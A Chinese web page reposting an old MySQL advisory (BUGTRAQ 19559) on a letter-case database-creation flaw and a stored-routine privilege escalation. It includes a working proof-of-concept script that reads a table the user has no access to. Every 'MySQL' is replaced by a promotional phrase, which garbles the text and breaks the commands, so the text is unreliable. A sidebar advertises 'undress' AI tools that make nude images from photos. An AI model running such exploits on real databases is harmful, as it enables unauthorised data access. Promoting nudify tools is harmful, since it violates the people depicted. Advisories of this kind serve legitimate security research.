MySQL权限提升与安全限制问题探讨
以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用,我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料,觉得挺好,今天就拿出来供大家分享。 受影响系统: MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合
以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用,我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料,觉得挺好,今天就拿出来供大家分享。
受影响系统:
MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合)
描述:
BUGTRAQ ID: 19559
MySQL(和PHP搭配之最佳组合)是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
在MySQL(和PHP搭配之最佳组合)上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL(和PHP搭配之最佳组合)的文件系统支持区分大小写的文件名。
此外,由于在错误的安全环境中计算了suid例程的参数,攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句。成功攻击要求用户对所存储例程拥有EXECUTE权限。
测试方法:
【警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】
1、创建数据库
<ol class="dp-xml"> <li class="alt"><span><span>$ MySQL(和PHP搭配之最佳组合) -h my.MySQL(和PHP搭配之最佳组合).server -u sample -p -A sample </span></span></li> <li><span>Enter password: </span></li> <li class="alt"><span>Welcome to the MySQL(和PHP搭配之最佳组合) monitor. Commands end with ; or \g. </span></li> <li><span>Your MySQL(和PHP搭配之最佳组合) connection id is 263935 to server version: 4.1.16-standard </span></li> <li class="alt"> <span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database another; </span> </li> <li><span>ERROR 1044: Access denied for user 'sample'@'%' to database 'another' </span></li> <li class="alt"> <span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database sAmple; </span> </li> <li><span>Query OK, 1 row affected (0.00 sec) </span></li> </ol>
2、权限提升
<ol class="dp-xml"> <li class="alt"><span><span>--disable_warnings </span></span></li> <li><span>drop database if exists MySQL(和PHP搭配之最佳组合)test1; </span></li> <li class="alt"><span>drop database if exists MySQL(和PHP搭配之最佳组合)test2; </span></li> <li><span>drop function if exists f_suid; </span></li> <li class="alt"><span>--enable_warnings </span></li> <li><span># Prepare playground </span></li> <li class="alt"><span>create database MySQL(和PHP搭配之最佳组合)test1; </span></li> <li><span>create database MySQL(和PHP搭配之最佳组合)test2; </span></li> <li class="alt"><span>create user malory@localhost; </span></li> <li><span>grant all privileges on MySQL(和PHP搭配之最佳组合)test1.* to malory@localhost; </span></li> <li class="alt"><span># Create harmless (but SUID!) function </span></li> <li><span>create function f_suid(i int) returns int return 0; </span></li> <li class="alt"><span>grant execute on function test.f_suid to malory@localhost; </span></li> <li><span>use MySQL(和PHP搭配之最佳组合)test2; </span></li> <li class="alt"><span># Create table in which malory@localhost will be interested but to which </span></li> <li><span># he won't have any access </span></li> <li class="alt"><span>create table t1 (i int); </span></li> <li><span>connect (malcon, localhost, malory,,MySQL(和PHP搭配之最佳组合)test1); </span></li> <li class="alt"><span># Correct malory@localhost don't have access to MySQL(和PHP搭配之最佳组合)test2.t1 </span></li> <li><span>--error ER_TABLEACCESS_DENIED_ERROR </span></li> <li class="alt"><span>select * from MySQL(和PHP搭配之最佳组合)test2.t1; </span></li> <li><span># Create function which will allow to exploit security hole </span></li> <li class="alt"><span>delimiter |; </span></li> <li><span>create function f_evil () </span></li> <li class="alt"><span>returns int </span></li> <li><span>sql security invoker </span></li> <li class="alt"><span>begin </span></li> <li> <span>set @</span><span class="attribute">a:</span><span>= </span><span class="attribute-value">current_user</span><span>(); </span> </li> <li class="alt"> <span>set @</span><span class="attribute">b:</span><span>= (select count(*) from MySQL(和PHP搭配之最佳组合)test2.t1); </span> </li> <li><span>return 0; </span></li> <li class="alt"><span>end| </span></li> <li><span>delimiter ;| </span></li> <li class="alt"><span># Again correct </span></li> <li><span>--error ER_TABLEACCESS_DENIED_ERROR </span></li> <li class="alt"><span>select f_evil(); </span></li> <li><span>select @a, @b; </span></li> <li class="alt"><span># Oops!!! it seems that f_evil() is executed in the context of </span></li> <li><span># f_suid() definer, so malory@locahost gets all info that he wants </span></li> <li class="alt"><span>select test.f_suid(f_evil()); </span></li> <li><span>select @a, @b; </span></li> <li class="alt"><span>connection default; </span></li> <li><span>drop user malory@localhost; </span></li> <li class="alt"><span>drop database MySQL(和PHP搭配之最佳组合)test1; </span></li> <li><span>drop database MySQL(和PHP搭配之最佳组合)test2; </span></li> </ol>
建议:
厂商补丁:MySQL(和PHP搭配之最佳组合) AB,目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1378
52
MySQL: Simple Concepts for Easy Learning
Apr 10, 2025 am 09:29 AM
MySQL is an open source relational database management system. 1) Create database and tables: Use the CREATEDATABASE and CREATETABLE commands. 2) Basic operations: INSERT, UPDATE, DELETE and SELECT. 3) Advanced operations: JOIN, subquery and transaction processing. 4) Debugging skills: Check syntax, data type and permissions. 5) Optimization suggestions: Use indexes, avoid SELECT* and use transactions.
How to open phpmyadmin
Apr 10, 2025 pm 10:51 PM
You can open phpMyAdmin through the following steps: 1. Log in to the website control panel; 2. Find and click the phpMyAdmin icon; 3. Enter MySQL credentials; 4. Click "Login".
How to create navicat premium
Apr 09, 2025 am 07:09 AM
Create a database using Navicat Premium: Connect to the database server and enter the connection parameters. Right-click on the server and select Create Database. Enter the name of the new database and the specified character set and collation. Connect to the new database and create the table in the Object Browser. Right-click on the table and select Insert Data to insert the data.
How to create a new connection to mysql in navicat
Apr 09, 2025 am 07:21 AM
You can create a new MySQL connection in Navicat by following the steps: Open the application and select New Connection (Ctrl N). Select "MySQL" as the connection type. Enter the hostname/IP address, port, username, and password. (Optional) Configure advanced options. Save the connection and enter the connection name.
MySQL and SQL: Essential Skills for Developers
Apr 10, 2025 am 09:30 AM
MySQL and SQL are essential skills for developers. 1.MySQL is an open source relational database management system, and SQL is the standard language used to manage and operate databases. 2.MySQL supports multiple storage engines through efficient data storage and retrieval functions, and SQL completes complex data operations through simple statements. 3. Examples of usage include basic queries and advanced queries, such as filtering and sorting by condition. 4. Common errors include syntax errors and performance issues, which can be optimized by checking SQL statements and using EXPLAIN commands. 5. Performance optimization techniques include using indexes, avoiding full table scanning, optimizing JOIN operations and improving code readability.
How to use single threaded redis
Apr 10, 2025 pm 07:12 PM
Redis uses a single threaded architecture to provide high performance, simplicity, and consistency. It utilizes I/O multiplexing, event loops, non-blocking I/O, and shared memory to improve concurrency, but with limitations of concurrency limitations, single point of failure, and unsuitable for write-intensive workloads.
How to recover data after SQL deletes rows
Apr 09, 2025 pm 12:21 PM
Recovering deleted rows directly from the database is usually impossible unless there is a backup or transaction rollback mechanism. Key point: Transaction rollback: Execute ROLLBACK before the transaction is committed to recover data. Backup: Regular backup of the database can be used to quickly restore data. Database snapshot: You can create a read-only copy of the database and restore the data after the data is deleted accidentally. Use DELETE statement with caution: Check the conditions carefully to avoid accidentally deleting data. Use the WHERE clause: explicitly specify the data to be deleted. Use the test environment: Test before performing a DELETE operation.
MySQL: An Introduction to the World's Most Popular Database
Apr 12, 2025 am 12:18 AM
MySQL is an open source relational database management system, mainly used to store and retrieve data quickly and reliably. Its working principle includes client requests, query resolution, execution of queries and return results. Examples of usage include creating tables, inserting and querying data, and advanced features such as JOIN operations. Common errors involve SQL syntax, data types, and permissions, and optimization suggestions include the use of indexes, optimized queries, and partitioning of tables.
